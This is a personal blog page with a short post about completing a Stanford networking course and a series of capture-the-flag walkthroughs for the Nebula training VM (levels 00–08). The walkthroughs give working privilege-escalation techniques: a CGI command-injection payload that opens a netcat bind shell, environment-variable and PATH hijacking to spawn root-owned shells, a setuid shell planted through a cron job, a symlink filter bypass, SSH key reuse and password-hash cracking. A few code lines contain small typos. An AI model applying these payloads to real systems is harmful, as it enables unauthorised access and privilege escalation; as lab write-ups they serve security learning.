I passed my course :-)

I was doing a free online networking course from Stanford University called “An Introduction to Computer Networks” recently, and they just told me that I passed.

Apparently I needed 50%, and I got 84%. I needn’t have tried so hard!

I think the course title was misleading; I was expecting to learn a bit more detail about stuff that I had already taught myself about simple LANs; network masks, routing, etc. but it was much more than just this this. It was actually more to do with how the internet works and included some quite complicated concepts and mathematical/statistical theories. I found it pretty hard work, to the point that I considered jacking it in a couple of times, because it was taking a lot of my evening and weekend time, but I’m glad I made it through. I’m just thankful that it was quite short (about 6 weeks) because now the pressure is off and I have some free time again.

The free course is by Stanford University professors Nick McKeown and Philip Levis and many subjects in detail including:

  • Protocols:
    • IP
    • TCP
    • UDP
    • ICMP
    • ARP
    • DHCP
    • DNS
    • NAT
    • BGP
    • Ethernet
  • Other Theory:
    • Encapsulation
    • Packet Switching
    • Delays (End to End & Queueing)
    • Broadcasting
    • Routing
    • Wireless

The course goes into so much detail in these subjects, and in many more. They are planning on re-running the course in Autumn 2013, so if any of this sounds interesting to you, then you should definitely consider enrolling nearer the time.

So now I’m just waiting to receive my statement on completion… I think it’s due in the new year.

Lastly I should say thanks to Nick and Philip for putting the course together and for offering it for free – Cheers guys

Exploit Exercises – Nebula – Level 08

I must admit I needed a bit of help with his one, I had most of it but not quite all. It started with the following information:

World readable files strike again. Check what that user was up to, and use it to log into flag08 account.
To do this level, log in as the level08 account with the password level08 . Files for this level can be found in /home/flag08.

So in ~flag08 there is one file of interest; capture.pcap. This is some captured network traffic. I copied this file onto my Macbook and opened it up in wireshark and spent some time looking through it. I found some interesting information like frame 43 contained a password prompt (the text “Password:”) from the server, followed by an ack from the client, then all subsequent packet exchanges contained 1 byte of TCP payload data from the client followed by an empty TCP ack packet from the server. Going through the packets, I could see that the user had sent: “backdoor…00Rm8.ate.” and then the server had replied “Login incorrect”. If we right click on a packet in the stream and select Follow TCP stream, we can see this a bit clearer.

But “backdoor…00Rm8.ate.” is not the password for flag08’s account, we need more investigation. While in the Follow TCP stream view, I selected hex dump view, and I can see that all the dots are not the same byte. Presumably they are all ascii, so I checked the ascii codes; 7f=backspace, 0d=Carriage-return.

So the password was “backd00Rmate”, this just so happens to be the password for flag08’s account.

Exploit Exercises – Nebula – Level 07

This one starts with the following information:

The flag07 user was writing their very first perl program that allowed them to ping hosts to see if they were reachable from the web server.

and Source code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#!/usr/bin/perl
 
use CGI qw{param};
 
print "Content-type: text/html\n\n";
 
sub ping {
    $host = $_[0];
 
    print("<html><head><title>Ping results</title></head><body><pre>");
 
    @output = `ping -c 3 $host 2>&1`;
    foreach $line (@output) { print "$line"; } 
 
    print("</pre></body></html>");
 
}
 
# check if Host set. if not, display normal page, etc
 
ping(param("Host"));

We can see that the flag07 user has an thttpd.conf file in his directory, indicating that he has a http daemon or (web server) running. This is further compounded by the fact that he has a perl script (index.cgi) in his home directory.

In the thttpd.conf file it tells us that the web server is running on port 7007. I didn’t want to exit the VM, which meant that I didn’t have a web browser, but I do have wget which allows me to make http requests from the command line so I ran:

wget -O- http://localhost:7007/index.cgi

and got some output telling me how to use ping (because it hadn’t been given sufficient arguments. From the perl code, I could see that it wants a variable submitted as “Host”. It looks like it will use this as the machine name to ping. This time I tried:

wget -O- http://localhost:7007/index.cgi?Host=localhost

and got back ping results, but I need to get this script to do something other than ping… I can see that the ping command is just a string with the submitted host name “injected” into it. There is no input sanitisation going on, so it is ripe for some code injection.

I could get the script to copy my elevated-shell-launcher program and thenset the setuid bit like I did in level 03, but this challenge reminded me of something I learned while playing with DVWA (using netcat to send shell over the network) so I tried that method instead. The url I need to load would submit the following as the Host variable:

;mkfifo /tmp/pipe;cat /tmp/pipe|bash|nc -l 4444 2&gt;&amp;1&gt;/tmp/pipe;rm /tmp/fifo;

When injected to the command that is run in the perl script, to actual command that is executed will be:

ping -c 3 ;mkfifo /tmp/pipe;cat /tmp/pipe|bash|nc -l 4444 2&gt;&amp;1&gt;/tmp/pipe;rm /tmp/fifo; 2&gt;&amp;1

This is quite a command, so I’ll break it down:

  • ping -c 3 ; – This command will fail because there is no host given, but we don’t care about that
  • mkfifo /tmp/pipe; – Make a special “pipe” file in /tmp/pipe, I’ll explain why later…
  • cat /tmp/pipe|bash|nc -l 4444 2>&1>/tmp/pipe; – this reads data from the /tmp/pipe and sends it to /bin/bash, which sends it’s output to nc, which is listening on port 4444, which then sends it’s output (stdout and stderr) back to /tmp/pipe.
  • rm /tmp/fifo; – clear up the pipe file after nc has closed.
  • 2>&1 – Redirects stderr to stdout. This is just left over from the perl script’s command, we don’t care about it really.

This should set up a netcat process listening on TCP port 4444 that will accept data (in our case this will be bash commands) from the network and send it to /tmp/pipe. cat will read data from /tmp/pipe and send it to bash, which will send it’s output to netcat, which will in turn send that back over the network. A kind of remote shell. Passing input/output of netcat and bash in this circular fashion is only possible by way of a fifo pipe and the cat command.

Obviously I’ll have to URL encode my host variable, so my whole command becomes:

wget -O- http://localhost:7007/index.cgi?Host=%3Bmkfifo%20%2Ftmp%2Fpipe%3Bcat%20%2Ftmp%2Fpipe%7Cbash%7Cnc%20-l%204444%202%3E%261%3E%2Ftmp%2Fpipe%3Brm%20%2Ftmp%2Ffifo%3B

Now I just connect from another tty session or another machine on the network (though you’ll have to edit the command if you do that) using:

nc localhost 4444

Now I can run any command including whoami and getflag

Exploit Exercises – Nebula – Level 06

Even less information about this one:

The flag06 account credentials came from a legacy unix system.
To do this level, log in as the level06 account with the password level06 . Files for this level can be found in /home/flag06.

I had a good idea what I’m looking for here, an easy to crack password hash in /etc/passwd rather than in the shadow file, so:

cat /etc/passwd | grep flag06

shows me the hash is ueqwOCnSGdsuM. I need to “crack” the hash. Time to get john the ripper on the case. At this point I didn’t have any other linux machines to hand, so I went to another tty session on this one and logged in a nebula and installed john (sudo apt-get install john). Then I ran john on the password file (john /etc/passwd) and he showed me the password. I switched over to flag06 account and the password worked as expected.

Exploit Exercises – Nebula – Level 05

Not much information to start on this one:

Check the flag05 home directory. You are looking for weak directory permissions
To do this level, log in as the level05 account with the password level05 . Files for this level can be found in /home/flag05.

The command ll (an alias for ls-alF) showed me that I had read access to ~flag05/.backup, and in there was a backup gzipped tar. Hopefully some goodies in here…

I unpacked the tar and found that it contained a folder called .ssh. This is used for secure shell authentication. That folder contained a private/public key pair and an authorized_keys file. The authorised_keys file is exactly the same as the public key file, so (assuming that the authorised_keys file had not been deleted since the backup) I should be able to ssh in using the private key, as long as it was not encrypted with a passphrase.

I copied the id_rsa file to ~/.ssh and tried to connect using:

ssh flag05@localhost

Bingo!

Exploit Exercises – Nebula – Level 04

The information about this level says:

This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it 🙂
To do this level, log in as the level04 account with the password level04 . Files for this level can be found in /home/flag04.

It also contains some source code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <fcntl.h>
 
int main(int argc, char **argv, char **envp)
{
    char buf[1024];
    int fd, rc;
 
    if(argc == 1) {
        printf("%s [file to read]\n", argv[0]);
        exit(EXIT_FAILURE);
    }
 
    if(strstr(argv[1], "token") != NULL) {
        printf("You may not access '%s'\n", argv[1]);
        exit(EXIT_FAILURE);
    }
 
    fd = open(argv[1], O_RDONLY);
    if(fd == -1) {
        err(EXIT_FAILURE, "Unable to open %s", argv[1]);
    }
 
    rc = read(fd, buf, sizeof(buf));
 
    if(rc == -1) {
        err(EXIT_FAILURE, "Unable to read fd %d", fd);
    }
 
    write(1, buf, rc);
}

Its fairly clear from looking at the files and the source code (I will admit I had to use a lot of man to help me understand the source code) that I want to read the contents of “token”, but the program won’t allow it. I tried things like ./token and ../flag04/token, but that didn’t work because the program is just searching for the string “token” anywhere in the first argument. Well… how do I get the contents of that file “into” another file without having permission to read the file? Symbolic link! Here’s what I did:

1
2
ln -s ~flag04/token /tmp/link
~flag04/flag04 /tmp/link

It turns out that the contents of the token file is the password for the flag04 account so I just did su flag04 and used that password. I ran getflag and violà!

Exploit Exercises – Nebula – Level 03

The information about this level says:

Check the home directory of flag03 and take note of the files there.
There is a crontab that is called every couple of minutes.
To do this level, log in as the level03 account with the password level03 . Files for this level can be found in /home/flag03.

Well looking in ~flag03 there is just one directory (writable.d) file and one file (writable.sh). I’m assuming that the cron job runs writable.sh every couple of minutes so I looked at that script. I can see that the script runs every file in the writable.d folder (which we have write access to), but will kill the process if it takes longer than 5 seconds. It then removes the file.

What we could do is make a quick bash script that will run getflag and save the output like this:

1
2
#!/bin/sh
getflag > /tmp/getflag.out

Which works (after we wait for the cron job to run it), but I want shell! So we’re going to borrow a trick from level01 and create a program that will launch a bash shell and get flag03 to set the setuid bit.

My C program looks like this:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
 
int main() {
    gid_t gid;
    uid_t uid;
    gid = getegid();
    uid = geteuid();
 
    setresgid(gid, id, gid);
    setresuid(uid, uid, uid);
 
    system("/bin/bash");
}

Now I just compile it with gcc and drop it in /tmp so that flag03 can access it. All I need the cron job to do now is make a copy and set the setuid bit, so here is the script I dropped in ~flag03/writable.d:

1
2
3
#!/bin/sh
cp /tmp/setuidshell /tmp/setuidshell2
chmod u+s /tmp/setuidshell2

This got me a program (/tmp/setuidshell2) in that gave me shell. From here I was able to run getflag, and also to run crontab -l to see that the cron job is actually called every 3 minutes.

Exploit Exercises – Nebula – Level 02

The information about this level says:

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?
To do this level, log in as the level02 account with the password level02 . Files for this level can be found in /home/flag02.

It also contains some source code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
 
int main(int argc, char **argv, char **envp)
{
    char *buffer;
 
    gid_t gid;
    uid_t uid;
 
    gid = getegid();
    uid = geteuid();
 
    setresgid(gid, gid, gid);
    setresuid(uid, uid, uid);
 
    buffer = NULL;
 
    asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
    printf("about to call system(\"%s\")\n", buffer);
 
    system(buffer);
}

This is similar to the Level 01. An environment variable $USER is being used to construct a string that is printed to the screen before being run. If we can edit that environment variable, we can inject a malicious command.

Initially I changed $USER so that running the program would execute getflag. The command I used was:

USER=;getflag;echo

I’ll break this down:
; – end the command and start a new one
getflag – run the getflag program
; – end the command and start a new one
echo – start a new echo command so that the following arguments don’t cause an error

This results in the following command being run:

/bin/echo ;getflag;echo is cool

I got a success message from get flag, but I wanted shell, so I changed my command to:

USER="Opening escalated shell...;bin/bash;echo Closing pwned shell, now that"

This time I got shell, and some cool text when going into the shell and when coming out (after typing exit)

Exploit Exercises – Nebula – Level 01

Following on from my previous post this one is about level01 of Nebula on exploit-excercises.com. The information about this level says:

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?
To do this level, log in as the level01 account with the password level01 . Files for this level can be found in /home/flag01.

It also contains some source code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
 
int main(int argc, char **argv, char **envp)
{
    gid_t gid;
    uid_t uid;
    gid = getegid();
    uid = geteuid();
 
    setresgid(gid, gid, gid);
    setresuid(uid, uid, uid);
 
    system("/usr/bin/env echo and now what?");
}

I’m not all that familiar with C (I’m more of a scripter), but I can understand enough; this appears to basically sets all uids for the process to the effective uid (presumably the setuid bit is present) and then calls a command line of:

/usr/bin/env echo and now what?

I wasn’t familiar with the env command so used a bit of googling until I learned that env is used to launch programs in a different environment. It also also sometimes used because a script needs to start with a shebang and followed by an interpreter directive, which must be an absolute path. Because some interpreters are not always installed at the same location, env is sometimes used to launch the correct interpreter by file name rather than full path (e.g. #!/usr/bin/env/ python). To do this, env searches through the list of paths in in the environment variable $PATH in order until it finds a correctly named file that it can execute in one of them. Presumably (for some unknown reason) env is being used here to invoke echo, but it means we can make a different echo program run by creating a malicious script and changing $PATH to point to it first.

I changed the path to include /tmp at the beginning by running the follwing command:

PATH=/tmp:$PATH

and then created a new symbolic link called echo to the getflag program:

ln -s /bin/getflag /tmp/echo

Now when I ran the vulnerable program I got a success message, but I wanted to go one further. I wanted shell…

I tried creating a symbolic link to bash, but now running flag01 failed due to the invalid arguments (“and now what?” are valid arguments for echo, but not bash), so I removed the symbolic link and created an executable shell script that ignored all arguments, and saved it as echo in /tmp. It contained the following two lines of code:

1
2
#!/bin/bash
/bin/bash

This, I hoped, would cause the vulnerable program to spawn a shell. I tested it and it worked. I then ran whoami to confirm that I was flag01 and then getflag to get a success message.

Exploit Exercises – Nebula – Level 00

I’ve started to have a look at the challenges offered by exploit-exercises.com and thought I’d document my progress.

This post is about Nebula Level 00. The information about this level says:

This level requires you to find a Set User ID program that will run as the “flag00” account. You could also find this by carefully looking in top level directories in / for suspicious looking directories.
Alternatively, look at the find man page.
To access this level, log in as level00 with the password of level00 .

This is a pretty simple challenge, but did mean I had to learn all about normal unix filesystem permissions and the more advanced setuid/setguid/stickybit permissions I also learned how to suppress errors from the find command and how to better use the find and man command.

The command I used was

find / -perm -u=s 2>/dev/null

I’ll break down what this does:

  • find – search for files in a directory hierarchy
  • / – start at the root of the filesystem
  • -perm -u=s – find files that have the setuid bit set in their permissions
  • 2>/dev/null – discard all errors (mostly about not having permission to scan directories)

One of the results was /bin/…/flag00. This (…\) is a suspicious looking directory! Running ll /bin/…/flag00 showed me that the owner was flag00 and the setuid bit was indeed set so I ran the file which told me to now run getflag then changed the user to flag00. Running getflag gave me a success message.

What I liked about this was that I had a shell running as the flag00 user so I could run other commands like whoami before typing exit to get out of the shell. At the time, I had no idea how I was put into a new shell, but it all becomes clearer in the next level…